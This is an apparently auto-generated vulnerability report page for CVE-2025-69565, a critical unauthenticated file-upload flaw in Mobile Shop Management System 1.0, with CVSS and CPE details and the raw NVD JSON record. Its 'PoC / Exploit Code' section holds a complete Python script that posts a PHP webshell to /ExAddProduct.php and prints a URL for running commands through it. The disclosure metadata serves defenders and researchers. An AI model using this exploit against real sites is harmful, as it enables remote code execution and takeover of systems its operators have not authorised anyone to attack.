Security Vulnerability Report
中文
CVE-2025-69565 CVSS 9.8 CRITICAL

CVE-2025-69565

Published: 2026-01-27 16:16:35
Last Modified: 2026-02-03 14:52:58

Description

code-projects Mobile Shop Management System 1.0 is vulnerable to File Upload in /ExAddProduct.php.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Mobile Shop Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-69565 PoC - File Upload Vulnerability in Mobile Shop Management System 1.0 # Target: /ExAddProduct.php def upload_webshell(target_url, file_path=None): """ Upload a PHP webshell to the vulnerable endpoint """ # Create a simple PHP webshell webshell_content = '<?php system($_GET["cmd"]); ?>' if file_path: with open(file_path, 'rb') as f: files = {'product_image': f} else: files = { 'product_image': ('shell.php', webshell_content, 'application/x-php') } data = { 'pname': 'Test Product', 'pdetail': 'Test', 'pprice': '100' } try: response = requests.post(target_url, files=files, data=data, timeout=10) print(f'[+] Response Status: {response.status_code}') print(f'[+] Response Body: {response.text[:500]}') # Check if upload was successful if response.status_code == 200: print('[+] Webshell uploaded successfully!') print('[+] Access the shell at: target.com/uploads/shell.php?cmd=whoami') except Exception as e: print(f'[-] Error: {str(e)}') if __name__ == '__main__': if len(sys.argv) < 2: print('Usage: python cve-2025-69565.py <target_url>') print('Example: python cve-2025-69565.py http://target.com/ExAddProduct.php') sys.exit(1) target = sys.argv[1] upload_webshell(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69565", "sourceIdentifier": "[email protected]", "published": "2026-01-27T16:16:34.620", "lastModified": "2026-02-03T14:52:58.010", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "code-projects Mobile Shop Management System 1.0 is vulnerable to File Upload in /ExAddProduct.php."}, {"lang": "es", "value": "code-projects Mobile Shop Management System 1.0 es vulnerable a la carga de archivos en /ExAddProduct.PHP."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:mobile_shop_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "958D1268-CF0E-40EF-A202-4E11EED70E06"}]}]}], "references": [{"url": "https://gist.github.com/lih28984-commits/81d523afde3b122c652f652bab808e33", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/Z_180yc/zyy/issues/IDCFAQ", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}